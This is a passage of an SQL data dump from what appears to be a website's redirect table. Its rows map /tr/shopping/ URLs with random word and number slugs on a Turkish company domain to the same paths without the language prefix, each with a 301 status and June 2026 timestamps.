00:00:00',301),(77514,'https://3s-technologies.com.tr/tr/shopping/contemn/1478385516.html',NULL,'https://3s-technologies.com.tr/shopping/contemn/1478385516.html','',1,0,'2026-06-11 10:02:37','0000-00-00 00:00:00',301),(77515,'https://3s-technologies.com.tr/tr/shopping/easily/2252214279.html',NULL,'https://3s-technologies.com.tr/shopping/easily/2252214279.html','',1,0,'2026-06-11 10:02:40','0000-00-00 00:00:00',301),(77516,'https://3s-technologies.com.tr/tr/shopping/commelina/3783498416.html',NULL,'https://3s-technologies.com.tr/shopping/commelina/3783498416.html','',1,0,'2026-06-11 10:02:43','0000-00-00 00:00:00',301),(77517,'https://3s-technologies.com.tr/tr/shopping/gangway/3982475341.html',NULL,'https://3s-technologies.com.tr/shopping/gangway/3982475341.html','',1,0,'2026-06-11 10:02:52','0000-00-00 00:00:00',301),(77518,'https://3s-technologies.com.tr/tr/shopping/mossbanker/3981263226.html',NULL,'https://3s-technologies.com.tr/shopping/mossbanker/3981263226.html','',1,0,'2026-06-11 10:02:55','0000-00-00 00:00:00',301),(77519,'https://3s-technologies.com.tr/tr/shopping/myrrhic/3994029492.html',NULL,'https://3s-technologies.com.tr/shopping/myrrhic/3994029492.html','',1,0,'2026-06-11 10:02:58','0000-00-00 00:00:00',301),(77520,'https://3s-technologies.com.tr/tr/shopping/princewood/3584775625.html',NULL,'https://3s-technologies.com.tr/shopping/princewood/3584775625.html','',1,0,'2026-06-11 10:03:01','0000-00-00 00:00:00',301),(77521,'https://3s-technologies.com.tr/tr/shopping/purport/2122603738.html',NULL,'https://3s-technologies.com.tr/shopping/purport/2122603738.html','',1,0,'2026-06-11 10:03:04','0000-00-00 00:00:00',301),(77522,'https://3s-technologies.com.tr/tr/shopping/adornment/1792646105.html',NULL,'https://3s-technologies.com.tr/shopping/adornment/1792646105.html','',1,0,'2026-06-11 10:03:07','0000-00-00 00:00:00',301),(77523,'https://3s-technologies.com.tr/tr/shopping/hymnist/1934436361.html',NULL,'https://3s-technologies.com.tr/shopping/hymnist/1934436361.html','',1,0,'2026-06-11 10:03:10','0000-00-00 00:00:00',301),(77524,'https://3s-technologies.com.tr/tr/shopping/outcourt/1932271787.html',NULL,'https://3s-technologies.com.tr/shopping/outcourt/1932271787.html','',1,0,'2026-06-11 10:03:13','0000-00-00 00:00:00',301),(77525,'https://3s-technologies.com.tr/tr/shopping/inelegances/2766803577.html',NULL,'https://3s-technologies.com.tr/shopping/inelegances/2766803577.html','',1,0,'2026-06-11 10:03:16','0000-00-00 00:00:00',301),(77526,'https://3s-technologies.com.tr/tr/shopping/cephalomere/3947979417.html',NULL,'https://3s-technologies.com.tr/shopping/cephalomere/3947979417.html','',1,0,'2026-06-11 10:03:19','0000-00-00 00:00:00',301),(77527,'https://3s-technologies.com.tr/tr/shopping/gillenia/3365930456.html',NULL,'https://3s-technologies.com.tr/shopping/gillenia/3365930456.html','',1,0,'2026-06-11 10:03:22','0000-00-00 00:00:00',301),(77528,'https://3s-technologies.com.tr/tr/shopping/reveries/1500305589.html',NULL,'https://3s-technologies.com.tr/shopping/reveries/1500305589.html','',1,0,'2026-06-11 10:03:25','0000-00-00 00:00:00',301),(77529,'https://3s-technologies.com.tr/tr/shopping/lamellicornia/3701852499.html',NULL,'https://3s-technologies.com.tr/shopping/lamellicornia/3701852499.html','',1,0,'2026-06-11 10:03:31','0000-00-00 00:00:00',301),(77530,'https://3s-technologies.com.tr/tr/shopping/bullata/1427181638.html',NULL,'https://3s-technologies.com.tr/shopping/bullata/1427181638.html','',1,0,'2026-06-11 10:03:36','0000-00-00 00:00:00',301),(77531,'https://3s-technologies.com.tr/tr/shopping/orthoclase/3761629105.html',NULL,'https://3s-technologies.com.tr/shopping/orthoclase/3761629105.html','',1,0,'2026-06-11 10:03:38','0000-00-00 00:00:00',301),(77532,'https://3s-technologies.com.tr/tr/shopping/scenemen/3182766472.html',NULL,'https://3s-technologies.com.tr/shopping/scenemen/3182766472.html','',1,0,'2026-06-11 10:03:41','0000-00-00 00:00:00',301),(77533,'https://3s-technologies.com.tr/tr/shopping/machinedriven/896589938.html',NULL,'https://3s-technologies.com.tr/shopping/machinedriven/896589938.html','',1,0,'2026-06-11 10:03:44','0000-00-00 00:00:00',301),(77534,'https://3s-technologies.com.tr/tr/shopping/stillhunting/3488757540.html',NULL,'https://3s-technologies.com.tr/shopping/stillhunting/3488757540.html','',1,0,'2026-06-11 10:03:47','0000-00-00 00:00:00',301),(77535,'https://3s-technologies.com.tr/tr/shopping/gracilariid/1501517688.html',NULL,'https://3s-technologies.com.tr/shopping/gracilariid/1501517688.html','',1,0,'2026-06-11 10:03:50','0000-00-00 00:00:00',301),(77536,'https://3s-technologies.com.tr/tr/shopping/karen/1057899838.html',NULL,'https://3s-technologies.com.tr/shopping/karen/1057899838.html','',1,0,'2026-06-11 10:03:53','0000-00-00 00:00:00',301),(77537,'https://3s-technologies.com.tr/tr/shopping/rhopalium/1623996189.html',NULL,'https://3s-technologies.com.tr/shopping/rhopalium/1623996189.html','',1,0,'2026-06-11 10:04:06','0000-00-00 00:00:00',301),(77538,'https://3s-technologies.com.tr/tr/shopping/xylobalsamum/2660371962.html',NULL,'https://3s-technologies.com.tr/shopping/xylobalsamum/2660371962.html','',1,0,'2026-06-11 10:04:08','0000-00-00 00:00:00',301),(77539,'https://3s-technologies.com.tr/tr/shopping/corticotrophin/2082795977.html',NULL,'https://3s-technologies.com.tr/shopping/corticotrophin/2082795977.html','',1,0,'2026-06-11 10:04:11','0000-00-00 00:00:00',301),(77540,'https://3s-technologies.com.tr/tr/shopping/octagon/1450501118.html',NULL,'https://3s-technologies.com.tr/shopping/octagon/1450501118.html','',1,0,'2026-06-11 10:04:14','0000-00-00 00:00:00',301),(77541,'https://3s-technologies.com.tr/tr/shopping/gravimetric/1609039279.html',NULL,'https://3s-technologies.com.tr/shopping/gravimetric/1609039279.html','',1,0,'2026-06-11 10:04:17','0000-00-00 00:00:00',301),(77542,'https://3s-technologies.com.tr/tr/shopping/coreligionistljnst/2449144729.html',NULL,'https://3s-technologies.com.tr/shopping/coreligionistljnst/2449144729.html','',1,0,'2026-06-11 10:04:20','0000-00-00 00:00:00',301),(77543,'https://3s-technologies.com.tr/tr/shopping/ganglia/1737318651.html',NULL,'https://3s-technologies.com.tr/shopping/ganglia/1737318651.html','',1,0,'2026-06-11 10:04:23','0000-00-00 00:00:00',301),(77544,'https://3s-technologies.com.tr/tr/shopping/agriology/1860359935.html',NULL,'https://3s-technologies.com.tr/shopping/agriology/1860359935.html','',1,0,'2026-06-11 10:04:26','0000-00-00 00:00:00',301),(77545,'https://3s-technologies.com.tr/tr/shopping/charwomen/277457332.html',NULL,'https://3s-technologies.com.tr/shopping/charwomen/277457332.html','',1,0,'2026-06-11 10:04:29','0000-00-00 00:00:00',301),(77546,'https://3s-technologies.com.tr/tr/shopping/xenodocheion/1016879962.html',NULL,'https://3s-technologies.com.tr/shopping/xenodocheion/1016879962.html','',1,0,'2026-06-11 10:04:32','0000-00-00 00:00:00',301),(77547,'https://3s-technologies.com.tr/tr/shopping/confuter/2688700088.html',NULL,'https://3s-technologies.com.tr/shopping/confuter/2688700088.html','',1,0,'2026-06-11 10:04:35','0000-00-00 00:00:00',301),(77548,'https://3s-technologies.com.tr/tr/shopping/melospiza/3685291886.html',NULL,'https://3s-technologies.com.tr/shopping/melospiza/3685291886.html','',1,0,'2026-06-11 10:04:41','0000-00-00 00:00:00',301),(77549,'https://3s-technologies.com.tr/tr/shopping/aulostoma/729850445.html',NULL,'https://3s-technologies.com.tr/shopping/aulostoma/729850445.html','',1,0,'2026-06-11 10:04:44','0000-00-00 00:00:00',301),(77550,'https://3s-technologies.com.tr/tr/shopping/tubulipora/1393734322.html',NULL,'https://3s-technologies.com.tr/shopping/tubulipora/1393734322.html','',1,0,'2026-06-11 10:04:50','0000-00-00 00:00:00',301),(77551,'https://3s-technologies.com.tr/tr/shopping/ductilimeter/56233389.html',NULL,'https://3s-technologies.com.tr/shopping/ductilimeter/56233389.html','',1,0,'2026-06-11 10:04:52','0000-00-00 00:00:00',301),(77552,'https://3s-technologies.com.tr/tr/shopping/yellowness/3804813539.html',NULL,'https://3s-technologies.com.tr/shopping/yellowness/3804813539.html','',1,0,'2026-06-11 10:04:55','0000-00-00 00:00:00',301),(77553,'https://3s-technologies.com.tr/tr/shopping/sawtoothed/2035206757.html',NULL,'https://3s-technologies.com.tr/shopping/sawtoothed/2035206757.html','',1,0,'2026-06-11 10:04:58','0000-00-00 00:00:00',301),(77554,'https://3s-technologies.com.tr/tr/shopping/douloureux/1738530750.html',NULL,'https://3s-technologies.com.tr/shopping/douloureux/1738530750.html','',1,0,'2026-06-11 10:05:01','0000-00-00 00:00:00',301),(77555,'https://3s-technologies.com.tr/tr/shopping/eurotia/1468201498.html',NULL,'https://3s-technologies.com.tr/shopping/eurotia/1468201498.html','',1,0,'2026-06-11 10:05:04','0000-00-00 00:00:00',301),(77556,'https://3s-technologies.com.tr/tr/shopping/toughpitch/3509096350.html',NULL,'https://3s-technologies.com.tr/shopping/toughpitch/3509096350.html','',1,0,'2026-06-11 10:05:07','0000-00-00 00:00:00',301),(77557,'https://3s-technologies.com.tr/tr/shopping/misfashion/2108884981.html',NULL,'https://3s-technologies.com.tr/shopping/misfashion/2108884981.html','',1,0,'2026-06-11 10:05:10','0000-00-00 00:00:00',301),(77558,'https://3s-technologies.com.tr/tr/shopping/onychophoran/1346750036.html',NULL,'https://3s-technologies.com.tr/shopping/onychophoran/1346750036.html','',1,0,'2026-06-11 10:05:13','0000-00-00 00:00:00',301),(77559,'https://3s-technologies.com.tr/tr/shopping/balsamita/2306142374.html',NULL,'https://3s-technologies.com.tr/shopping/balsamita/2306142374.html','',1,0,'2026-06-11 10:05:16','0000-00-00 00:00:00',301),(77560,'https://3s-technologies.com.tr/tr/shopping/cookshop/613214982.html',NULL,'https://3s-technologies.com.tr/shopping/cookshop/613214982.html','',1,0,'2026-06-11 10:05:25','0000-00-00 00:00:00',301),(77561,'https://3s-technologies.com.tr/tr/shopping/largiloquent/2468244500.html',NULL,'https://3s-technologies.com.tr/shopping/largiloquent/2468244500.html','',1,0,'2026-06-11 10:05:28','0000-00-00 00:00:00',301),(77562,'https://3s-technologies.com.tr/tr/shopping/nonadmission/3227097016.html',NULL,'https://3s-technologies.com.tr/shopping/nonadmission/3227097016.html','',1,0,'2026-06-11 10:05:36','0000-00-00 00:00:00',301),(77563,'https://3s-technologies.com.tr/tr/shopping/wouwou/2431976951.html',NULL,'https://3s-technologies.com.tr/shopping/wouwou/2431976951.html','',1,0,'2026-06-11 10:05:40','0000-00-00 00:00:00',301),(77564,'https://3s-technologies.com.tr/tr/shopping/ecclesiology/2698669906.html',NULL,'https://3s-technologies.com.tr/shopping/ecclesiology/2698669906.html','',1,0,'2026-06-11 10:05:59','0000-00-00 00:00:00',301),(77565,'https://3s-technologies.com.tr/tr/shopping/pokal/450276179.html',NULL,'https://3s-technologies.com.tr/shopping/pokal/450276179.html','',1,0,'2026-06-11 10:06:01','0000-00-00 00:00:00',301),(77566,'https://3s-technologies.com.tr/tr/shopping/chiliad/4195479656.html',NULL,'https://3s-technologies.com.tr/shopping/chiliad/4195479656.html','',1,0,'2026-06-11 10:06:47','0000-00-00 00:00:00',301),(77567,'https://3s-technologies.com.tr/tr/shopping/niobic/2670341764.html',NULL,'https://3s-technologies.com.tr/shopping/niobic/2670341764.html','',1,0,'2026-06-11 10:06:49','0000-00-00 00:00:00',301),(77568,'https://3s-technologies.com.tr/tr/shopping/tureenful/1947339226.html',NULL,'https://3s-technologies.com.tr/shopping/tureenful/1947339226.html','',1,0,'2026-06-11 10:06:56','0000-00-00 00:00:00',301),(77569,'https://3s-technologies.com.tr/tr/shopping/hasard/2866107739.html',NULL,'https://3s-technologies.com.tr/shopping/hasard/2866107739.html','',1,0,'2026-06-11 10:07:01','0000-00-00 00:00:00',301),(77570,'https://3s-technologies.com.tr/tr/shopping/purveance/873294211.html',NULL,'https://3s-technologies.com.tr/shopping/purveance/873294211.html','',1,0,'2026-06-11 10:07:05','0000-00-00 00:00:00',301),(77571,'https://3s-technologies.com.tr/tr/shopping/bahama/1795602921.html',NULL,'https://3s-technologies.com.tr/shopping/bahama/1795602921.html','',1,0,'2026-06-11 10:07:07','0000-00-00 00:00:00',301),(77572,'https://3s-technologies.com.tr/tr/shopping/significavit/1651648091.html',NULL,'https://3s-technologies.com.tr/shopping/significavit/1651648091.html','',1,0,'2026-06-11 10:07:14','0000-00-00 00:00:00',301),(77573,'https://3s-technologies.com.tr/tr/shopping/oligosepalous/2593450374.html',NULL,'https://3s-technologies.com.tr/shopping/oligosepalous/2593450374.html','',1,0,'2026-06-11 10:07:18','0000-00-00 00:00:00',301),(77574,'https://3s-technologies.com.tr/tr/shopping/zygantra/634715214.html',NULL,'https://3s-technologies.com.tr/shopping/zygantra/634715214.html','',1,0,'2026-06-11 10:07:46','0000-00-00 00:00:00',301),(77575,'https://3s-technologies.com.tr/tr/shopping/heteroclitical/4080826980.html',NULL,'https://3s-technologies.com.tr/shopping/heteroclitical/4080826980.html','',1,0,'2026-06-11 10:07:49','0000-00-00 00:00:00',301),(77576,'https://3s-technologies.com.tr/tr/shopping/atabrine/3466837467.html',NULL,'https://3s-technologies.com.tr/shopping/atabrine/3466837467.html','',1,0,'2026-06-11 10:08:02','0000-00-00 00:00:00',301),(77577,'https://3s-technologies.com.tr/tr/shopping/hemianaesthesia/3535372614.html',NULL,'https://3s-technologies.com.tr/shopping/hemianaesthesia/3535372614.html','',1,0,'2026-06-11 10:08:04','0000-00-00 00:00:00',301),(77578,'https://3s-technologies.com.tr/tr/shopping/sannina/3130775756.html',NULL,'https://3s-technologies.com.tr/shopping/sannina/3130775756.html','',1,0,'2026-06-11 10:08:49','0000-00-00 00:00:00',301),(77579,'https://3s-technologies.com.tr/tr/shopping/adenomatous/1024589105.html',NULL,'https://3s-technologies.com.tr/shopping/adenomatous/1024589105.html','',1,0,'2026-06-11 10:08:51','0000-00-00 00:00:00',301),(77580,'https://3s-technologies.com.tr/tr/shopping/lanyard/1883261725.html',NULL,'https://3s-technologies.com.tr/shopping/lanyard/1883261725.html','',1,0,'2026-06-11 10:08:58','0000-00-00 00:00:00',301),(77581,'https://3s-technologies.com.tr/tr/shopping/chionea/3773763481.html',NULL,'https://3s-technologies.com.tr/shopping/chionea/3773763481.html','',1,0,'2026-06-11 10:09:00','0000-00-00 00:00:00',301),(77582,'https://3s-technologies.com.tr/tr/shopping/gaillard/2618768722.html',NULL,'https://3s-technologies.com.tr/shopping/gaillard/2618768722.html','',1,0,'2026-06-11 10:09:28','0000-00-00 00:00:00',301),(77583,'https://3s-technologies.com.tr/tr/shopping/quiescent/2253166786.html',NULL,'https://3s-technologies.com.tr/shopping/quiescent/2253166786.html','',1,0,'2026-06-11 10:09:31','0000-00-00 00:00:00',301),(77584,'https://3s-technologies.com.tr/tr/shopping/levororotary/3914505161.html',NULL,'https://3s-technologies.com.tr/shopping/levororotary/3914505161.html','',1,0,'2026-06-11 10:09:54','0000-00-00 00:00:00',301),(77585,'https://3s-technologies.com.tr/tr/shopping/gymnopaedic/3263528088.html',NULL,'https://3s-technologies.com.tr/shopping/gymnopaedic/3263528088.html','',1,0,'2026-06-11 10:09:57','0000-00-00 00:00:00',301),(77586,'https://3s-technologies.com.tr/tr/shopping/staphyloraphy/343145354.html',NULL,'https://3s-technologies.com.tr/shopping/staphyloraphy/343145354.html','',1,0,'2026-06-11 10:10:02','0000-00-00 00:00:00',301),(77587,'https://3s-technologies.com.tr/tr/shopping/kwashiorkor/487100200.html',NULL,'https://3s-technologies.com.tr/shopping/kwashiorkor/487100200.html','',1,0,'2026-06-11 10:10:06','0000-00-00 00:00:00',301),(77588,'https://3s-technologies.com.tr/tr/shopping/xenurine/2306771077.html',NULL,'https://3s-technologies.com.tr/shopping/xenurine/2306771077.html','',1,0,'2026-06-11 10:10:16','0000-00-00 00:00:00',301),(77589,'https://3s-technologies.com.tr/tr/shopping/threpsology/293391544.html',NULL,'https://3s-technologies.com.tr/shopping/threpsology/293391544.html','',1,0,'2026-06-11 10:10:19','0000-00-00 00:00:00',301),(77590,'https://3s-technologies.com.tr/tr/shopping/lacertian/99814046.html',NULL,'https://3s-technologies.com.tr/shopping/lacertian/99814046.html','',1,0,'2026-06-11 10:10:45','0000-00-00 00:00:00',301),(77591,'https://3s-technologies.com.tr/tr/shopping/fermental/3730293369.html',NULL,'https://3s-technologies.com.tr/shopping/fermental/3730293369.html','',1,0,'2026-06-11 10:10:47','0000-00-00 00:00:00',301),(77592,'https://3s-technologies.com.tr/tr/shopping/scorpaenid/4150705384.html',NULL,'https://3s-technologies.com.tr/shopping/scorpaenid/4150705384.html','',1,0,'2026-06-11 10:11:11','0000-00-00 00:00:00',301),(77593,'https://3s-technologies.com.tr/tr/shopping/antiproton/3395746948.html',NULL,'https://3s-technologies.com.tr/shopping/antiproton/3395746948.html','',1,0,'2026-06-11 10:11:14','0000-00-00 00:00:00',301),(77594,'https://3s-technologies.com.tr/tr/shopping/historionomer/3763210299.html',NULL,'https://3s-technologies.com.tr/shopping/historionomer/3763210299.html','',1,0,'2026-06-11 10:12:00','0000-00-00 00:00:00',301),(77595,'https://3s-technologies.com.tr/tr/shopping/spleenish/1447493508.html',NULL,'https://3s-technologies.com.tr/shopping/spleenish/1447493508.html','',1,0,'2026-06-11 10:12:02','0000-00-00 00:00:00',301),(77596,'https://3s-technologies.com.tr/tr/shopping/petrosilex/850400093.html',NULL,'https://3s-technologies.com.tr/shopping/petrosilex/850400093.html','',1,0,'2026-06-11 10:12:34','0000-00-00 00:00:00',301),(77597,'https://3s-technologies.com.tr/tr/shopping/dispensator/1590495863.html',NULL,'https://3s-technologies.com.tr/shopping/dispensator/1590495863.html','',1,0,'2026-06-11 10:12:37','0000-00-00 00:00:00',301),(77598,'https://3s-technologies.com.tr/tr/shopping/pharmacognosy/1141642124.html',NULL,'https://3s-technologies.com.tr/shopping/pharmacognosy/1141642124.html','',1,0,'2026-06-11 10:13:14','0000-00-00 00:00:00',301),(77599,'https://3s-technologies.com.tr/tr/shopping/ladylike/1236266275.html',NULL,'https://3s-technologies.com.tr/shopping/ladylike/1236266275.html','',1,0,'2026-06-11 10:13:17','0000-00-00 00:00:00',301),(77600,'https://3s-technologies.com.tr/tr/shopping/tubicolous/4113062213.html',NULL,'https://3s-technologies.com.tr/shopping/tubicolous/4113062213.html','',1,0,'2026-06-11 10:13:25','0000-00-00 00:00:00',301),(77601,'https://3s-technologies.com.tr/tr/shopping/kermes/205684278.html',NULL,'https://3s-technologies.com.tr/shopping/kermes/205684278.html','',1,0,'2026-06-11 10:14:35','0000-00-00 00:00:00',301),(77602,'https://3s-technologies.com.tr/tr/shopping/dispensing/2284702803.html',NULL,'https://3s-technologies.com.tr/shopping/dispensing/2284702803.html','',1,0,'2026-06-11 10:14:38','0000-00-00 00:00:00',301),(77603,'https://3s-technologies.com.tr/tr/shopping/closedring/1777854063.html',NULL,'https://3s-technologies.com.tr/shopping/closedring/1777854063.html','',1,0,'2026-06-11 10:14:41','0000-00-00 00:00:00',301),(77604,'https://3s-technologies.com.tr/tr/shopping/ripen/3748975583.html',NULL,'https://3s-technologies.com.tr/shopping/ripen/3748975583.html','',1,0,'2026-06-11 10:14:44','0000-00-00 00:00:00',301),(77605,'https://3s-technologies.com.tr/tr/shopping/autotoxication/2462049809.html',NULL,'https://3s-technologies.com.tr/shopping/autotoxication/2462049809.html','',1,0,'2026-06-11 10:14:47','0000-00-00 00:00:00',301),(77606,'https://3s-technologies.com.tr/tr/shopping/coverpoint/508761219.html',NULL,'https://3s-technologies.com.tr/shopping/coverpoint/508761219.html','',1,0,'2026-06-11 10:14:50','0000-00-00 00:00:00',301),(77607,'https://3s-technologies.com.tr/tr/shopping/conversation/1370081667.html',NULL,'https://3s-technologies.com.tr/shopping/conversation/1370081667.html','',1,0,'2026-06-11 10:14:57','0000-00-00 00:00:00',301),(77608,'https://3s-technologies.com.tr/tr/shopping/tsetse/3989452871.html',NULL,'https://3s-technologies.com.tr/shopping/tsetse/3989452871.html','',1,0,'2026-06-11 10:14:59','0000-00-00 00:00:00',301),(77609,'https://3s-technologies.com.tr/tr/shopping/phonetics/2647502834.html',NULL,'https://3s-technologies.com.tr/shopping/phonetics/2647502834.html','',1,0,'2026-06-11 10:15:02','0000-00-00 00:00:00',301),(77610,'https://3s-technologies.com.tr/tr/shopping/scrit/4121191229.html',NULL,'https://3s-technologies.com.tr/shopping/scrit/4121191229.html','',1,0,'2026-06-11 10:15:05','0000-00-00 00:00:00',301),(77611,'https://3s-technologies.com.tr/tr/shopping/nervous/809764650.html',NULL,'https://3s-technologies.com.tr/shopping/nervous/809764650.html','',1,0,'2026-06-11 10:15:08','0000-00-00 00:00:00',301),(77612,'https://3s-technologies.com.tr/tr/shopping/shuddering/224124816.html',NULL,'https://3s-technologies.com.tr/shopping/shuddering/224124816.html','',1,0,'2026-06-11 10:15:11','0000-00-00 00:00:00',301),(77613,'https://3s-technologies.com.tr/tr/shopping/focuses/1345204762.html',NULL,'https://3s-technologies.com.tr/shopping/focuses/1345204762.html','',1,0,'2026-06-11 10:15:14','0000-00-00 00:00:00',301),(77614,'https://3s-technologies.com.tr/tr/shopping/bagful/3349192519.html',NULL,'https://3s-technologies.com.tr/shopping/bagful/3349192519.html','',1,0,'2026-06-11 10:15:17','0000-00-00 00:00:00',301),(77615,'https://3s-technologies.com.tr/tr/shopping/subterrestrial/3598324730.html',NULL,'https://3s-technologies.com.tr/shopping/subterrestrial/3598324730.html','',1,0,'2026-06-11 10:15:23','0000-00-00 00:00:00',301),(77616,'https://3s-technologies.com.tr/tr/shopping/pleinly/1294629603.html',NULL,'https://3s-technologies.com.tr/shopping/pleinly/1294629603.html','',1,0,'2026-06-11 10:15:29','0000-00-00 00:00:00',301),(77617,'https://3s-technologies.com.tr/tr/shopping/headlamp/473420534.html',NULL,'https://3s-technologies.com.tr/shopping/headlamp/473420534.html','',1,0,'2026-06-11 10:15:31','0000-00-00 00:00:00',301),(77618,'https://3s-technologies.com.tr/tr/shopping/instilled/4079046823.html',NULL,'https://3s-technologies.com.tr/shopping/instilled/4079046823.html','',1,0,'2026-06-11 10:15:34','0000-00-00 00:00:00',301),(77619,'https://3s-technologies.com.tr/tr/shopping/lengthy/2545779947.html',NULL,'https://3s-technologies.com.tr/shopping/lengthy/2545779947.html','',1,0,'2026-06-11 10:15:37','0000-00-00 00:00:00',301),(77620,'https://3s-technologies.com.tr/tr/shopping/punctuate/543980635.html',NULL,'https://3s-technologies.com.tr/shopping/punctuate/543980635.html','',1,0,'2026-06-11 10:15:40','0000-00-00 00:00:00',301),(77621,'https://3s-technologies.com.tr/tr/shopping/carnalized/1133715722.html',NULL,'https://3s-technologies.com.tr/shopping/carnalized/1133715722.html','',1,0,'2026-06-11 10:15:43','0000-00-00 00:00:00',301),(77622,'https://3s-technologies.com.tr/tr/shopping/washedout/4082423512.html',NULL,'https://3s-technologies.com.tr/shopping/washedout/4082423512.html','',1,0,'2026-06-11 10:15:46','0000-00-00 00:00:00',301),(77623,'https://3s-technologies.com.tr/tr/shopping/disgorging/2826780496.html',NULL,'https://3s-technologies.com.tr/shopping/disgorging/2826780496.html','',1,0,'2026-06-11 10:15:49','0000-00-00 00:00:00',301),(77624,'https://3s-technologies.com.tr/tr/shopping/honkey/3231117762.html',NULL,'https://3s-technologies.com.tr/shopping/honkey/3231117762.html','',1,0,'2026-06-11 10:15:54','0000-00-00 00:00:00',301),(77625,'https://3s-technologies.com.tr/tr/shopping/perjure/3316869717.html',NULL,'https://3s-technologies.com.tr/shopping/perjure/3316869717.html','',1,0,'2026-06-11 10:15:56','0000-00-00 00:00:00',301),(77626,'https://3s-technologies.com.tr/tr/shopping/lugging/2722373803.html',NULL,'https://3s-technologies.com.tr/shopping/lugging/2722373803.html','',1,0,'2026-06-11 10:16:21','0000-00-00 00:00:00',301),(77627,'https://3s-technologies.com.tr/tr/shopping/needle/1141195778.html',NULL,'https://3s-technologies.com.tr/shopping/needle/1141195778.html','',1,0,'2026-06-11 10:16:25','0000-00-00 00:00:00',301),(77628,'https://3s-technologies.com.tr/tr/shopping/proposed/1104769609.html',NULL,'https://3s-technologies.com.tr/shopping/proposed/1104769609.html','',1,0,'2026-06-11 10:16:28','0000-00-00 00:00:00',301),(77629,'https://3s-technologies.com.tr/tr/shopping/percolated/1431831087.html',NULL,'https://3s-technologies.com.tr/shopping/percolated/1431831087.html','',1,0,'2026-06-11 10:16:31','0000-00-00 00:00:00',301),(77630,'https://3s-technologies.com.tr/tr/shopping/aigulet/1675629876.html',NULL,'https://3s-technologies.com.tr/shopping/aigulet/1675629876.html','',1,0,'2026-06-11 10:16:34','0000-00-00 00:00:00',301),(77631,'https://3s-technologies.com.tr/tr/shopping/fondon/369581915.html',NULL,'https://3s-technologies.com.tr/shopping/fondon/369581915.html','',1,0,'2026-06-11 10:16:37','0000-00-00 00:00:00',301),(77632,'https://3s-technologies.com.tr/tr/shopping/volumenometry/1195193018.html',NULL,'https://3s-technologies.com.tr/shopping/volumenometry/1195193018.html','',1,0,'2026-06-11 10:16:40','0000-00-00 00:00:00',301),(77633,'https://3s-technologies.com.tr/tr/shopping/elfishness/3821700258.html',NULL,'https://3s-technologies.com.tr/shopping/elfishness/3821700258.html','',1,0,'2026-06-11 10:16:43','0000-00-00 00:00:00',301),(77634,'https://3s-technologies.com.tr/tr/shopping/obtrude/4111118533.html',NULL,'https://3s-technologies.com.tr/shopping/obtrude/4111118533.html','',1,0,'2026-06-11 10:16:51','0000-00-00 00:00:00',301),(77635,'https://3s-technologies.com.tr/tr/shopping/batter/3167031703.html',NULL,'https://3s-technologies.com.tr/shopping/batter/3167031703.html','',1,0,'2026-06-11 10:16:55','0000-00-00 00:00:00',301),(77636,'https://3s-technologies.com.tr/tr/shopping/omnipercipient/1075784450.html',NULL,'https://3s-technologies.com.tr/shopping/omnipercipient/1075784450.html','',1,0,'2026-06-11 10:16:58','0000-00-00 00:00:00',301),(77637,'https://3s-technologies.com.tr/tr/shopping/ashcolored/415441639.html',NULL,'https://3s-technologies.com.tr/shopping/ashcolored/415441639.html','',1,0,'2026-06-11 10:17:01','0000-00-00 00:00:00',301),(77638,'https://3s-technologies.com.tr/tr/shopping/heavyheaded/1728760375.html',NULL,'https://3s-technologies.com.tr/shopping/heavyheaded/1728760375.html','',1,0,'2026-06-11 10:17:04','0000-00-00 00:00:00',301),(77639,'https://3s-technologies.com.tr/tr/shopping/tattled/3778996310.html',NULL,'https://3s-technologies.com.tr/shopping/tattled/3778996310.html','',1,0,'2026-06-11 10:17:07','0000-00-00 00:00:00',301),(77640,'https://3s-technologies.com.tr/tr/shopping/clipfish/406438317.html',NULL,'https://3s-technologies.com.tr/shopping/clipfish/406438317.html','',1,0,'2026-06-11 10:17:10','0000-00-00 00:00:00',301),(77641,'https://3s-technologies.com.tr/tr/shopping/eohippus/1921289329.html',NULL,'https://3s-technologies.com.tr/shopping/eohippus/1921289329.html','',1,0,'2026-06-11 10:17:13','0000-00-00 00:00:00',301),(77642,'https://3s-technologies.com.tr/tr/shopping/knockoff/2276437772.html',NULL,'https://3s-technologies.com.tr/shopping/knockoff/2276437772.html','',1,0,'2026-06-11 10:17:19','0000-00-00 00:00:00',301),(77643,'https://3s-technologies.com.tr/tr/shopping/legumen/3576339077.html',NULL,'https://3s-technologies.com.tr/shopping/legumen/3576339077.html','',1,0,'2026-06-11 10:17:23','0000-00-00 00:00:00',301),(77644,'https://3s-technologies.com.tr/tr/shopping/raiae/1053003502.html',NULL,'https://3s-technologies.com.tr/shopping/raiae/1053003502.html','',1,0,'2026-06-11 10:17:27','0000-00-00 00:00:00',301),(77645,'https://3s-technologies.com.tr/tr/shopping/priestcap/2866873476.html',NULL,'https://3s-technologies.com.tr/shopping/priestcap/2866873476.html','',1,0,'2026-06-11 10:17:30','0000-00-00 00:00:00',301),(77646,'https://3s-technologies.com.tr/tr/shopping/aviado/276197309.html',NULL,'https://3s-technologies.com.tr/shopping/aviado/276197309.html','',1,0,'2026-06-11 10:17:33','0000-00-00 00:00:00',301),(77647,'https://3s-technologies.com.tr/tr/shopping/catesbaei/3495907475.html',NULL,'https://3s-technologies.com.tr/shopping/catesbaei/3495907475.html','',1,0,'2026-06-11 10:17:35','0000-00-00 00:00:00',301),(77648,'https://3s-technologies.com.tr/tr/shopping/starmonger/1796205167.html',NULL,'https://3s-technologies.com.tr/shopping/starmonger/1796205167.html','',1,0,'2026-06-11 10:17:39','0000-00-00 00:00:00',301),(77649,'https://3s-technologies.com.tr/tr/shopping/phantasmascope/372771850.html',NULL,'https://3s-technologies.com.tr/shopping/phantasmascope/372771850.html','',1,0,'2026-06-11 10:17:42','0000-00-00 00:00:00',301),(77650,'https://3s-technologies.com.tr/tr/shopping/corroborate/4009517374.html',NULL,'https://3s-technologies.com.tr/shopping/corroborate/4009517374.html','',1,0,'2026-06-11 10:17:44','0000-00-00 00:00:00',301),(77651,'https://3s-technologies.com.tr/tr/shopping/odoriferously/2857488834.html',NULL,'https://3s-technologies.com.tr/shopping/odoriferously/2857488834.html','',1,0,'2026-06-11 10:17:47','0000-00-00 00:00:00',301),(77652,'https://3s-technologies.com.tr/tr/shopping/merrier/856870632.html',NULL,'https://3s-technologies.com.tr/shopping/merrier/856870632.html','',1,0,'2026-06-11 10:17:56','0000-00-00 00:00:00',301),(77653,'https://3s-technologies.com.tr/tr/shopping/deprivable/1264844195.html',NULL,'https://3s-technologies.com.tr/shopping/deprivable/1264844195.html','',1,0,'2026-06-11 10:17:58','0000-00-00 